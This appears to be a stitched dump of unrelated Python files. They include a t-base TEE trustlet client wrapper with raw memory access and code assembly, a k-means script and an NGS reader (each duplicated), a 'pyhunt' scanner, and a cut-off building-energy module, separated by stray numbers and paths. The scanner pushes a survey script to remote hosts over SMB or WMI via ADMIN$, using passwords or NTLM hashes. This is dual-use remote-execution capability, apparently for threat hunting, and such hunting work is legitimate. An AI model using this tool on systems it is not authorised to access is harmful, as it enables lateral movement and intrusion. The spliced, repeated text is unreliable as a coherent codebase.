a new connection to a t-base device. It initializes all device specific resources required to communicate with an t-base instance located on the specified device in the system. Raises: :class:`Error`: See below the possible error codes: - ERR_INVALID_OPERATION if device already opened - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_UNKNOWN_DEVICE when device_id is unknown - ERR_INVALID_DEVICE_FILE if kernel module under /dev/mobicore cannot be opened """ res = client.mcOpenDevice(self._id) if res != const.OK: raise Error(res) def close(self): """ Close the connection to a t-base device. When closing a device, active sessions have to be closed beforehand. Resources associated with the device will be released. The device may be opened again after it has been closed. Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_SESSION_PENDING when a session is still open - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ res = client.mcCloseDevice(self._id) if res != const.OK: raise Error(res) @contextmanager def buffer(self, len): """ Instantiate a new memory buffer. Args: len (:obj:`int`): Length of the block in bytes Yields: :class:`Buffer`: The allocated block of memory This method can be used with a Python "with statement", meaning that it will automatically call :func:`Device.malloc` on enter and :func:`Device.free` on exit. :: with dev.buffer(0x1000) as tci: # do something with the buffer """ buf = self.malloc(len) yield buf self.free(buf) def malloc(self, len): """ Allocate a block of memory. The driver allocates a contiguous block of memory which can be used as WSM. This implicates that the allocated memory is always aligned to 4K. Args: len (:obj:`int`): Length of the block in bytes Returns: :class:`Buffer`: The allocated block of memory Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_NO_FREE_MEMORY if no more contiguous memory is available in this size or for this process """ buf = ctypes.POINTER(ctypes.c_uint8)() res = client.mcMallocWsm(self._id, 0, len, ctypes.byref(buf), 0) if res != const.OK: raise Error(res) ptr = ctypes.cast(buf, ctypes.c_void_p) return Buffer(ptr, len) def free(self, buf): """ Free a block of memory. The driver will free a block of memory previously allocated. Args: buf (:class:`Buffer`): The memory block to be freed Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_FREE_MEMORY_FAILED on failures """ ptr = ctypes.cast(buf._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcFreeWsm(self._id, ptr) if res != const.OK: raise Error(res) buf.close() def version(self): """ Get t-base version information of a device. Returns: :obj:`dict`: t-base version info :: { 'productId': b't-base-EXYNOS64-Android-302A-V015-681_681', 'versionMci': 65536, 'versionSo': 131074, 'versionMclf': 131077, 'versionContainer': 131073, 'versionMcConfig': 2, 'versionTlApi': 65552, 'versionDrApi': 65538, 'versionCmp': 0 } Raises: :class:`Error`: See below the possible error codes: - ERR_UNKNOWN_DEVICE when device is not open - INVALID_PARAMETER if a parameter is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur """ info = types.mcVersionInfo() res = client.mcGetMobiCoreVersion(self._id, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) class Trustlet(object): """ Initialize a session to a Trusted Application. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`bytes`): Buffer containing the TA binary This class can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.open` on enter and :func:`Trustlet.close` on exit. :: with Trustlet(dev, tci, buf) as app: # do something with the trustlet """ @staticmethod def uuid(dev, tci, uuid): """ Initialize a session to a TA using its UUID. Args: dev (:class:`Device`): The t-base device to use tci (:class:`Buffer`): TCI buffer for communicating with the TA buf (:obj:`str`): The Trusted Application's UUID Returns: :class:`Trustlet`: A Trusted Application session """ path = "/vendor/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): path = "/system/app/mcRegistry/{}.tlbin".format(uuid) if not os.path.exists(path): raise IOError("Could not find the trustlet") with open(path, "rb") as fd: return Trustlet(dev, tci, fd.read()) def __init__(self, dev, tci, buf): self._ses = types.mcSessionHandle() self._ses.device_id = dev.id self._tci = tci self._buf = buf @property def id(self): """ The identifier of the Trusted Application session. """ return self._ses.sessionId def __enter__(self): self.open() return self def __exit__(self, *_): self.close() return False def open(self): """ Open a new session to a Trusted Application (Trustlet). The trustlet will be loaded from the memory buffer. Write MCP open message to buffer and notify t-base about the availability of a new command. Waits till t-base responds with the new session ID (stored in the MCP buffer). Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_DEVICE when device id is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon socket occur - ERR_UNKNOWN_DEVICE when daemon returns an error - ERR_TRUSTED_APPLICATION_NOT_FOUND when TA cannot be loaded """ ta = (ctypes.c_uint8 * len(self._buf)).from_buffer_copy(self._buf) ta_ptr = ctypes.cast(ta, ctypes.POINTER(ctypes.c_uint8)) tci_ptr = ctypes.cast(self._tci._ptr, ctypes.POINTER(ctypes.c_uint8)) res = client.mcOpenTrustlet(ctypes.byref(self._ses), 0, ta_ptr, len(self._buf), tci_ptr, self._tci._len) if res != const.OK: raise Error(res) def close(self): """ Close a Trusted Application session. Closes the specified t-base session. The call will block until the session has been closed. Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if session parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_INVALID_DEVICE_FILE when daemon cannot open trustlet file """ res = client.mcCloseSession(ctypes.byref(self._ses)) if res != const.OK: raise Error(res) def notify(self): """ Notify a session. Notifies the session end point about available message data. Corresponding errors can only be received by :func:`Trustlet.wait_notification`. A session has to be opened in advance. Raises: :class:`Error`: See below the possible error codes: - DRV_INVALID_PARAMETER if session parameter is invalid - DRV_ERR_UNKNOWN_SESSION when session id is invalid - DRV_ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcNotify(self._ses) if res != const.OK: raise Error(res) def wait_notification(self, timeout=const.INFINITE_TIMEOUT): """ Wait for a notification. Wait for a notification issued by t-base for a specific session. The timeout parameter specifies the number of milliseconds the call will wait for a notification. If the caller passes 0 as timeout value the call will immediately return. If timeout value is below 0 the call will block until a notification for the session has been received. Warning: If timeout is below 0, the call will block. Caller has to trust the other side to send a notification to wake him up again. Args: timeout (:obj:`int`): Time in milliseconds to wait Raises: :class:`Error`: See below the possible error codes: - ERR_TIMEOUT if no notification arrived in time - INFO_NOTIFICATION if a problem with the session was encountered. Get more details with :func:`Trustlet.error()`. - ERR_NOTIFICATION if a problem with the socket occurred - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid """ res = client.mcWaitNotification(ctypes.byref(self._ses), timeout) if res != const.OK: raise Error(res) @contextmanager def share(self, buf): """ Share an additional buffer with the Trusted Application. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Yields: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } This method can be used with a Python "with statement", meaning that it will automatically call :func:`Trustlet.map` on enter and :func:`Trustlet.unmap` on exit. :: with app.share(buf): # do something with the additional buffer """ map = self.map(buf) yield map self.unmap(buf, map) def map(self, buf): """ Map additional bulk buffer between a Client Application (CA) and the Trusted Application (TA) for a session. Memory allocated in user space of the CA can be mapped as additional communication channel (besides TCI) to the Trusted Application. Limitation of the Trusted Application memory structure apply: only 6 chunks can be mapped with a maximum chunk size of 1 MiB each. Warning: It is up to the application layer (CA) to inform the Trusted Application about the additional mapped bulk memory. Args: buf (:class:`Buffer`): Memory buffer to be shared with the TA Returns: :obj:`dict`: Information about the mapped bulk buffer :: { 'sVirtualAddr': 9437184, 'sVirtualLen': 4096 } Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf is already uses as bulk buffer or when registering the buffer failed """ info = types.mcBulkMap() res = client.mcMap(ctypes.byref(self._ses), buf._ptr, buf._len, ctypes.byref(info)) if res != const.OK: raise Error(res) return dict(info) def unmap(self, buf, info): """ Remove additional mapped bulk buffer between Client Application (CA) and the Trusted Application (TA) for a session. Warning: The bulk buffer will immediately be unmapped from the session context. The application layer (CA) must inform the TA about unmapping of the additional bulk memory before making this call. Args: buf (:class:`Buffer`): Memory buffer shared with the TA info (:obj:`dict`): Information about the mapped bulk buffer Raises: :class:`Error`: See below the possible error codes: - INVALID_PARAMETER if a parameter is invalid - ERR_UNKNOWN_SESSION when session id is invalid - ERR_UNKNOWN_DEVICE when device id of session is invalid - ERR_DAEMON_UNREACHABLE when problems with daemon occur - ERR_BULK_MAPPING when buf was not registered earlier or when unregistering failed """ info = types.mcBulkMap(info) res = client.mcUnmap(ctypes.byref(self._ses), buf._ptr, ctypes.byref(info)) if res != const.OK: raise Error(res) def error(self): """ Get additional error information of the last error that occurred on a session. After the request the stored error code will be deleted. Returns: :obj:`int`: >0 Trusted Application has terminated itself with this value, <0 Trusted Application is dead because of an error within t-base (e.g. Kernel exception) """ err = ctypes.c_int32() res = client.mcGetSessionErrorCode(ctypes.byref(self._ses), ctypes.byref(err)) if res != const.OK: raise Error(res) return err.value class Buffer(io.RawIOBase): """ This class exposes a memory memory buffer as a raw I/O stream object. It use provide convenience functions to read/write common data types. Warning: The constructor of this class should never be called directly. If you need to allocate a new buffer, use :func:`Device.malloc` instead. """ def __init__(self, ptr, len): self._ptr = ptr self._len = len self._pos = 0 def seek(self, offset, whence=0): self._checkClosed() if whence == io.SEEK_SET: self._pos = offset elif whence == io.SEEK_CUR: self._pos += offset elif whence == io.SEEK_END: self._pos = self._len + offset self._pos = max(0, min(self._len, self._pos)) return self._pos def truncate(self, size=None): self._checkClosed() if size is None: size = self._pos self._len = max(0, size) self.seek(self._pos) return self._len def seekable(self): return True def readinto(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos b[:size] = (ctypes.c_char * size).from_address(addr).raw self._pos += size return size def readable(self): return True def write(self, b): self._checkClosed() addr = self._ptr.value + self._pos size = min(self._len, self._pos + len(b)) - self._pos (ctypes.c_char * size).from_address(addr).raw = b[:size] self._pos += size return size def writable(self): return True def skip(self, size): """ Move stream position forward of size bytes. Args: size (:obj:`int`): Number of bytes to skip """ self.seek(size, io.SEEK_CUR) def read_byte(self, signed=False): """ Read the byte at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<b" if signed else "<B" return struct.unpack(fmt, self.read(1))[0] def read_word(self, signed=False): """ Read the word (2-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<h" if signed else "<H" return struct.unpack(fmt, self.read(2))[0] def read_dword(self, signed=False): """ Read the double word (4-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<i" if signed else "<I" return struct.unpack(fmt, self.read(4))[0] def read_qword(self, signed=False): """ Read the quadro word (8-byte long) value at the current position. Args: signed (:obj:`bool`): Interpret as signed Returns: :obj:`int`: The value read """ fmt = "<q" if signed else "<Q" return struct.unpack(fmt, self.read(8))[0] def read_float(self): """ Read the float (4-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<f", self.read(4))[0] def read_double(self): """ Read the double (8-byte long) value at the current position. Returns: :obj:`float`: The value read """ return struct.unpack("<d", self.read(8))[0] def read_string(self): """ Read the NULL-terminated string at the current position. Returns: :obj:`str`: The string read """ val = b"" c = self.read(1) while c != b"\x00": val += c c = self.read(1) return val def write_byte(self, val, signed=False): """ Write a byte at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<b" if signed else "<B" self.write(struct.pack(fmt, val)) def write_word(self, val, signed=False): """ Write a word (2-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<h" if signed else "<H" self.write(struct.pack(fmt, val)) def write_dword(self, val, signed=False): """ Write a double word (4-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<i" if signed else "<I" self.write(struct.pack(fmt, val)) def write_qword(self, val, signed=False): """ Write a quadro word (8-byte long) at the current position. Args: val (:class:`int`): The value to write signed (:obj:`bool`): Interpret as signed """ fmt = "<q" if signed else "<Q" self.write(struct.pack(fmt, val)) def write_float(self, val): """ Write a float (4-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<f", val)) def write_double(self, val): """ Write a double (8-byte long) value at the current position. Args: val (:class:`float`): The value to write """ self.write(struct.pack("<d", val)) def write_string(self, val): """ Write a NULL-terminated string at the current position. Args: val (:obj:`str`): The string to write """ self.write(val) self.write(b"\x00") def hexdump(self, size=-1): """ Display an hex dump of the size bytes at the current position. Args: size (:obj:`int`): The number of bytes to dump (-1 = all) """ if size == -1: size = self._len - self._pos for i in range(0, size, 0x10): hex_dmp = "0x{:08x}:".format(i) chr_dmp = " | " for j in range(min(0x10, size - i)): hex_chr = self.read(1)[0] hex_dmp += " {:02x}".format(hex_chr) if 0x20 <= hex_chr <= 0x7E: chr_dmp += chr(hex_chr) else: chr_dmp += "." hex_dmp = hex_dmp.ljust(60, " ") print(hex_dmp + chr_dmp) def assemble(self, code, thumb=True): """ Assemble code using Keystone and write it at the current position. Args: code (:obj:`str`): the code to assemble thumb (:obj:`bool`): True if Thumb, False otherwise Returns: :obj:`int`: the number of bytes written """ from keystone import Ks, KS_ARCH_ARM, KS_MODE_ARM, KS_MODE_THUMB ks = Ks(KS_ARCH_ARM, KS_MODE_THUMB if thumb else KS_MODE_ARM) addr = self._ptr.value bs, size = ks.asm(code, addr) self.write(bytes(bytearray(bs))) return len(bs) def disassemble(self, size, thumb=True): """ Display the bytes disassembled using Capstone at the current position. Args: size (:obj:`int`): the number of bytes to disassemble thumb (:obj:`bool`): True if Thumb, False otherwise """ from capstone import Cs, CS_ARCH_ARM, CS_MODE_ARM, CS_MODE_THUMB cs = Cs(CS_ARCH_ARM, CS_MODE_THUMB if thumb else CS_MODE_ARM) addr = self._ptr.value for insn in cs.disasm(self.read(size), addr): insn_info = insn.address, insn.mnemonic, insn.op_str print("{:08x}:\t{} {}".format(insn_info))
0.617513
0.201892
import logging as log import numpy as np import random log.basicConfig(format="%(message)s", level=log.INFO) def load_data(file_path): """加载数据 源数据格式为多行,每行为两个浮点数,分别表示 (x,y) """ data = [] with open(file_path, 'r', encoding='utf-8') as fr: for line in fr.read().splitlines(): line_float = list(map(float, line.split('\t'))) data.append(line_float) data = np.array(data) return data def score_euclidean(a, b): """计算两个点之间的欧式距离""" s = np.sqrt(np.sum(np.power(a - b, 2))) return s def rand_center(data, k): """随机采样 k 个样本作为聚类中心""" centers = np.array(random.sample(list(data), k)) return centers def k_means(data, k, max_iter=100, score=score_euclidean, e=1e-6): """ K-Means 算法 一般 K-Mean 算法的终止条件有如下几个: 1. 所有样本的类别不再改变 2. 达到最大迭代次数 3. 精度达到要求(?) 返回聚类中心及聚类结果 """ # 样本数 n = len(data) # 保存结果 # 每个结果为一个二元组 [label, score] 分别保存每个样本所在的簇及距离质心的距离 ret = np.array([[-1, np.inf]] * n) # 选取聚类中心 centers = rand_center(data, k) changed = True # 标记样本类别是否改变 n_iter = 0 # 记录迭代次数 while changed and n_iter < max_iter: changed = False n_iter += 1 for i in range(n): # 对每个数据 i_score = np.inf i_label = -1 for j in range(k): # 与每个质心比较 s_ij = score(data[i], centers[j]) if s_ij < i_score: i_score = s_ij i_label = j if ret[i, 0] != i_label: # 样本的类别发生了改变 changed = True ret[i, :] = i_label, i_score # 更新聚类中心 log.info(centers) for i in range(k): data_i = data[ret[:, 0] == i] # 标签为 i 的样本 centers[i, :] = np.mean(data_i, axis=0) # 按类别过滤样本 log.info(n_iter) # 迭代次数 return centers, ret def _test(): """""" file_path = r"./data.txt" data = load_data(file_path) print(data) print(np.shape(data)[1]) s = score_euclidean(data[0], data[1]) print(s) centers = rand_center(data, 3) print(centers) if __name__ == '__main__': """""" # _test() file_path = "./data.txt" data = load_data(file_path) centers, ret = k_means(data, 3) # print(ret)
_codes/machine_learning/KMeans/kmeans.py
import logging as log import numpy as np import random log.basicConfig(format="%(message)s", level=log.INFO) def load_data(file_path): """加载数据 源数据格式为多行,每行为两个浮点数,分别表示 (x,y) """ data = [] with open(file_path, 'r', encoding='utf-8') as fr: for line in fr.read().splitlines(): line_float = list(map(float, line.split('\t'))) data.append(line_float) data = np.array(data) return data def score_euclidean(a, b): """计算两个点之间的欧式距离""" s = np.sqrt(np.sum(np.power(a - b, 2))) return s def rand_center(data, k): """随机采样 k 个样本作为聚类中心""" centers = np.array(random.sample(list(data), k)) return centers def k_means(data, k, max_iter=100, score=score_euclidean, e=1e-6): """ K-Means 算法 一般 K-Mean 算法的终止条件有如下几个: 1. 所有样本的类别不再改变 2. 达到最大迭代次数 3. 精度达到要求(?) 返回聚类中心及聚类结果 """ # 样本数 n = len(data) # 保存结果 # 每个结果为一个二元组 [label, score] 分别保存每个样本所在的簇及距离质心的距离 ret = np.array([[-1, np.inf]] * n) # 选取聚类中心 centers = rand_center(data, k) changed = True # 标记样本类别是否改变 n_iter = 0 # 记录迭代次数 while changed and n_iter < max_iter: changed = False n_iter += 1 for i in range(n): # 对每个数据 i_score = np.inf i_label = -1 for j in range(k): # 与每个质心比较 s_ij = score(data[i], centers[j]) if s_ij < i_score: i_score = s_ij i_label = j if ret[i, 0] != i_label: # 样本的类别发生了改变 changed = True ret[i, :] = i_label, i_score # 更新聚类中心 log.info(centers) for i in range(k): data_i = data[ret[:, 0] == i] # 标签为 i 的样本 centers[i, :] = np.mean(data_i, axis=0) # 按类别过滤样本 log.info(n_iter) # 迭代次数 return centers, ret def _test(): """""" file_path = r"./data.txt" data = load_data(file_path) print(data) print(np.shape(data)[1]) s = score_euclidean(data[0], data[1]) print(s) centers = rand_center(data, 3) print(centers) if __name__ == '__main__': """""" # _test() file_path = "./data.txt" data = load_data(file_path) centers, ret = k_means(data, 3) # print(ret)
0.242564
0.370738
import os from typing import Optional, Sequence, Dict, List from csr.exceptions import ReaderException from sources2csr.ngs import AnalysisType, NGS, LibraryStrategy class NgsReader: """Reader that reads NGS data files. """ def __init__(self, input_dir: str, library_strategy: LibraryStrategy): self.input_dir = input_dir self.library_strategy = library_strategy @staticmethod def determine_analysis_type(filename: str) -> Optional[AnalysisType]: """Determine whole genome or whole exome sequencing analysis type based on the filename. If _WGS or _WXS are not in the filename returns None. :param filename: name of the input file :return: Type of sequencing event """ if '_WGS' in filename.upper(): return AnalysisType.WGS elif '_WXS' in filename.upper(): return AnalysisType.WXS else: return None @staticmethod def biosource_biomaterial_from_sample_id(sample_id: str, filename: str, by='_') -> tuple: """ Splits sample _id into biosource_id and biomaterial_id. Every sample ID should be structured as <BiosourceID>_<BiomaterialID>, e.g. PMCBS000AAA_PMCBM000AAA. :param sample_id: cBioPortal sample ID :param filename: ull path with a name of the input file :param by: Character to use for splitting, default: '_' :return: biosource_id and biomaterial_id values tuple or NgsReaderException """ biosource_biomaterial_pair = sample_id.split(by) if len(biosource_biomaterial_pair) != 2: raise ReaderException('Invalid sample_id format found in {} NGS file. sample_id: {}' .format(filename, sample_id)) else: return biosource_biomaterial_pair[0], biosource_biomaterial_pair[1] @staticmethod def list_files(input_dir: str) -> List[str]: """ Get list of file names inside a directory :param input_dir: directory with input files :return: List of file paths with names """ for file in os.listdir(input_dir): if os.path.isfile(os.path.join(input_dir, file)): yield file def map_ngs(self, biosources_biomaterials_dict: Dict[str, Sequence[str]], filename: str) -> Optional[Sequence[NGS]]: """ Maps biosource to biomaterials dictionary to the NGS Sequence :param biosources_biomaterials_dict: biosource to biomaterials dictionary :param filename: name of the input file :return: """ ngs_data = [] analysis_type = self.determine_analysis_type(filename) for biosource, biomaterials in biosources_biomaterials_dict.items(): for biomaterial in biomaterials: ngs_data.append(NGS(biosource_id=biosource, biomaterial_id=biomaterial, analysis_type=analysis_type, library_strategy=self.library_strategy)) return ngs_data def read_data(self, filename: str) -> Optional[Sequence[NGS]]: pass
sources2csr/ngs_reader.py
import os from typing import Optional, Sequence, Dict, List from csr.exceptions import ReaderException from sources2csr.ngs import AnalysisType, NGS, LibraryStrategy class NgsReader: """Reader that reads NGS data files. """ def __init__(self, input_dir: str, library_strategy: LibraryStrategy): self.input_dir = input_dir self.library_strategy = library_strategy @staticmethod def determine_analysis_type(filename: str) -> Optional[AnalysisType]: """Determine whole genome or whole exome sequencing analysis type based on the filename. If _WGS or _WXS are not in the filename returns None. :param filename: name of the input file :return: Type of sequencing event """ if '_WGS' in filename.upper(): return AnalysisType.WGS elif '_WXS' in filename.upper(): return AnalysisType.WXS else: return None @staticmethod def biosource_biomaterial_from_sample_id(sample_id: str, filename: str, by='_') -> tuple: """ Splits sample _id into biosource_id and biomaterial_id. Every sample ID should be structured as <BiosourceID>_<BiomaterialID>, e.g. PMCBS000AAA_PMCBM000AAA. :param sample_id: cBioPortal sample ID :param filename: ull path with a name of the input file :param by: Character to use for splitting, default: '_' :return: biosource_id and biomaterial_id values tuple or NgsReaderException """ biosource_biomaterial_pair = sample_id.split(by) if len(biosource_biomaterial_pair) != 2: raise ReaderException('Invalid sample_id format found in {} NGS file. sample_id: {}' .format(filename, sample_id)) else: return biosource_biomaterial_pair[0], biosource_biomaterial_pair[1] @staticmethod def list_files(input_dir: str) -> List[str]: """ Get list of file names inside a directory :param input_dir: directory with input files :return: List of file paths with names """ for file in os.listdir(input_dir): if os.path.isfile(os.path.join(input_dir, file)): yield file def map_ngs(self, biosources_biomaterials_dict: Dict[str, Sequence[str]], filename: str) -> Optional[Sequence[NGS]]: """ Maps biosource to biomaterials dictionary to the NGS Sequence :param biosources_biomaterials_dict: biosource to biomaterials dictionary :param filename: name of the input file :return: """ ngs_data = [] analysis_type = self.determine_analysis_type(filename) for biosource, biomaterials in biosources_biomaterials_dict.items(): for biomaterial in biomaterials: ngs_data.append(NGS(biosource_id=biosource, biomaterial_id=biomaterial, analysis_type=analysis_type, library_strategy=self.library_strategy)) return ngs_data def read_data(self, filename: str) -> Optional[Sequence[NGS]]: pass
0.825836
0.331471
from pyhunt.deploy import WMIEXEC from pyhunt.deploy_smb import CMDEXEC from multiprocessing import Process, Pool from time import sleep class HuntScan: def __init__(self, usr, pwd, domain, hashes=''): self.targets = [] self.__currentpath = '' self.surveyfile = "survey/survey.ps1" self.tgtdestdirectory = "c:\\windows\\temp" self.__status = {} self.requiredfiles = ["survey/sigcheck.exe", "survey/sigcheck64.exe"] self.components = [] self.__receiver = None self.__username = usr self.__password = <PASSWORD> self.__domain = domain self.__hashes = hashes self.protocol = "SMB" self.shell = None def run(self): try: if self.__hashes == '': if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, self.__password, self.__domain, None, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, None, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) else: if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, '', self.__domain, self.__hashes, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, self.__hashes, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) threads = [] cap = 1 running = 0 for t in self.targets: p = Process(target=executer.run, args=(t,)) p.start() threads.append(p) running += 1 for p in threads: p.join() except (Exception, KeyboardInterrupt), e: import traceback print traceback.print_exc() print str(e) def addTargetList(self, tgt): self.targets = tgt def __str__(self): retVal = self.__domain + "\\" + self.__username + "\n" + str(self.targets) + "\n" + "Survey File: " + self.surveyfile + "\n" + "Protocol: " + self.protocol + "\n" + "Required Files: " + str(self.requiredfiles) + "\n" return retVal #h = HuntScan("user", "pw", "localhost", "") #h.addTargetList(["192.168.149.141"]) #h.addTargetList(["10.1.1.20"]) #h.run()
scan.py
from pyhunt.deploy import WMIEXEC from pyhunt.deploy_smb import CMDEXEC from multiprocessing import Process, Pool from time import sleep class HuntScan: def __init__(self, usr, pwd, domain, hashes=''): self.targets = [] self.__currentpath = '' self.surveyfile = "survey/survey.ps1" self.tgtdestdirectory = "c:\\windows\\temp" self.__status = {} self.requiredfiles = ["survey/sigcheck.exe", "survey/sigcheck64.exe"] self.components = [] self.__receiver = None self.__username = usr self.__password = <PASSWORD> self.__domain = domain self.__hashes = hashes self.protocol = "SMB" self.shell = None def run(self): try: if self.__hashes == '': if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, self.__password, self.__domain, None, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, None, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) else: if self.protocol == "WMI": executer = WMIEXEC('dir', self.__username, '', self.__domain, self.__hashes, None, "ADMIN$", scanObject=self) else: executer = CMDEXEC(self.__username, self.__password, self.__domain, self.__hashes, None, None, None, "SHARE", "ADMIN$", 445, scanObject=self) threads = [] cap = 1 running = 0 for t in self.targets: p = Process(target=executer.run, args=(t,)) p.start() threads.append(p) running += 1 for p in threads: p.join() except (Exception, KeyboardInterrupt), e: import traceback print traceback.print_exc() print str(e) def addTargetList(self, tgt): self.targets = tgt def __str__(self): retVal = self.__domain + "\\" + self.__username + "\n" + str(self.targets) + "\n" + "Survey File: " + self.surveyfile + "\n" + "Protocol: " + self.protocol + "\n" + "Required Files: " + str(self.requiredfiles) + "\n" return retVal #h = HuntScan("user", "pw", "localhost", "") #h.addTargetList(["192.168.149.141"]) #h.addTargetList(["10.1.1.20"]) #h.run()
0.240329
0.070624
import os import geopandas as gpd import numpy as np import pandas as pd from prereise.gather.demanddata.bldg_electrification import const def aggregate_puma_df( puma_states, tract_puma_mapping, tract_gbs_area, tract_degday_normals, tract_pop ): """Scale census tract data up to puma areas. :param pandas.DataFrame puma_states: mapping of puma to state. :param pandas.DataFrame tract_puma_mapping: tract to puma mapping. :param pandas.DataFrame tract_gbs_area: General Building Stock area for residential, commercial, industrial areas by tract :param pandas.DataFrame tract_degday_normals: heating and cooling degree day normals by tract :param pandas.DataFrame tract_pop: population by tract :return: (*pandas.DataFrame*) -- population; residential, commercial, industrial areas; heating degree days; cooling degree days; residential space heating household fuel fractions. """ # Set up puma_df data frame puma_df = puma_states.to_frame() # Combine tract-level data into single data frame with only census tracts with building area data tract_data = pd.concat( [tract_gbs_area, tract_degday_normals, tract_pop], axis=1, join="inner" ) tract_data = tract_data.loc[:, ~tract_data.columns.duplicated()] # Group tracts by PUMA for aggregration grouped_tracts = tract_data.groupby(tract_puma_mapping["puma"]) # Sum population and GBS areas; store in data frame puma_df.loc[grouped_tracts.groups.keys(), "pop"] = grouped_tracts["pop"].sum() puma_df.loc[grouped_tracts.groups.keys(), "res_area_gbs_m2"] = grouped_tracts[ "res_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "com_area_gbs_m2"] = grouped_tracts[ "com_area_gbs_m2" ].sum() puma_df.loc[grouped_tracts.groups.keys(), "ind_area_gbs_m2"] = grouped_tracts[ "ind_area_gbs_m2" ].sum() # Population-weighted average hdd, cdd, and acpen tract_data["pop_hdd65_normals"] = tract_data["pop"] * tract_data["hdd65_normals"] tract_data["pop_cdd65_normals"] = tract_data["pop"] * tract_data["cdd65_normals"] puma_df.loc[grouped_tracts.groups.keys(), "hdd65_normals"] = ( grouped_tracts["pop_hdd65_normals"].sum() / grouped_tracts["pop"].sum() ) puma_df.loc[grouped_tracts.groups.keys(), "cdd65_normals"] = ( grouped_tracts["pop_cdd65_normals"].sum() / grouped_tracts["pop"].sum() ) # Load RECS and CBECS area scales for res and com resscales = pd.read_csv(os.path.join(data_dir, "area_scale_res.csv")) comscales = pd.read_csv(os.path.join(data_dir, "area_scale_com.csv")) # Compute GBS areas for state groups in RECS and CBECS resscales["GBS"] = [ puma_df.query("state in @s")["res_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in resscales.fillna(0).values.tolist() ] comscales["GBS"] = [ puma_df.query("state in @s")["com_area_gbs_m2"].sum() * const.conv_m2_to_ft2 * const.conv_ft2_to_bsf for s in comscales.fillna(0).values.tolist() ] # Compute scalar for GBS area to base year area correspondingg to RECS/CBECS # and assuming a constant annual growth rate resscales["area_scalar"] = ( resscales[f"RECS{const.recs_date_1}"] * ( ( resscales[f"RECS{const.recs_date_2}"] / resscales[f"RECS{const.recs_date_1}"] ) ** ( (const.base_year - const.recs_date_1) / (const.recs_date_2 - const.recs_date_1) ) ) / resscales["GBS"] ) comscales["area_scalar"] = ( comscales[f"CBECS{const.cbecs_date_1}"] * ( ( comscales[f"CBECS{const.cbecs_date_2}"] / comscales[f"CBECS{const.cbecs_date_1}"] ) ** ( (const.base_year - const.cbecs_date_1) / (const.cbecs_date_2 - const.cbecs_date_1) ) ) / comscales["GBS"] ) # Scale puma area from gbs to base year for state in const.state_list: state_row_scale_res = resscales[resscales.eq(state).any(1)].reset_index() state_row_scale_com = comscales[comscales.eq(state).any(1)].reset_index() res_area_scalar = state_row_scale_res["area_scalar"][0] com_area_scalar = state_row_scale_com["area_scalar"][0] puma_df.loc[puma_df["state"] == state, f"res_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["res_area_gbs_m2"] * res_area_scalar ) puma_df.loc[puma_df["state"] == state, f"com_area_{const.base_year}_m2"] = ( puma_df[puma_df["state"] == state]["com_area_gbs_m2"] * com_area_scalar ) return puma_df def scale_fuel_fractions(hh_fuels, puma_df, year=const.base_year): """Scale census tract data up to puma areas. :param pandas.DataFrame hh_fuels: household fuel type by puma. :param pandas.DataFrame puma_df: output of :func:`aggregate_puma_df`. :param 